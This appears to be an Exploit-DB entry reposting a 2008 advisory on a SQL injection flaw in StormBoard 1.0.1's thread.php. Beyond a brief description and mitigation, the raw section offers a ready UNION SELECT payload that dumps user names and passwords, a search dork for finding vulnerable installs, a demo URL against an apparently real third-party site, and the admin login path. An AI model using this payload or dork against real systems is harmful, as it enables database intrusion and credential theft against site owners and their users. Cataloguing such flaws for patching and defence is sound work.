StormBoard Version 1.0.1 (thread.php id=) SQL Injection Vulnerability

vendor:

StormBoard

by:

Samir-M

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: StormBoard

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:stormboard:stormboard:1.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

StormBoard Version 1.0.1 (thread.php id=) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. This can be done by appending the malicious query to the vulnerable parameter in the URL. This can allow the attacker to gain access to the database and extract sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

==============================================================================
_________________________________{Ù„Ø§Ø§Ù„Ù‡ Ø§Ù„ÙŠ Ù„Ù„Ù‡ Ù…ØÙ…Ø¯ Ø±Ø³ÙˆÙ„ Ù„Ù„Ù‡}_________________________________
 ---------------------------------(Samir-M)---------------------------------- 
      StormBoard Version 1.0.1 (thread.php id=) SQL Injection Vulnerability

by  : Samir-M

Msn : Km7@Hotmail.De

from: Morocco
 ----------------------------------------------------------------------------
darck :

"Powered by : StormBoard Version 1.0.1"
 ---------------------------------------------------------------------------- 

Exploit:

site.com/thread.php?id=-null union select 1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users


Dome:
al-andalos.com/thread.php?id=-null+union+all+select+1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--


Login:
site.com/admin

 ----------------------------------------------------------------------------
Samir-M > A-flow > Gess-Inject0r > Wassim-Net
 ----------------------------------------------------------------------------
_______________________________________________________________________________
===============================================================================

# milw0rm.com [2008-12-23]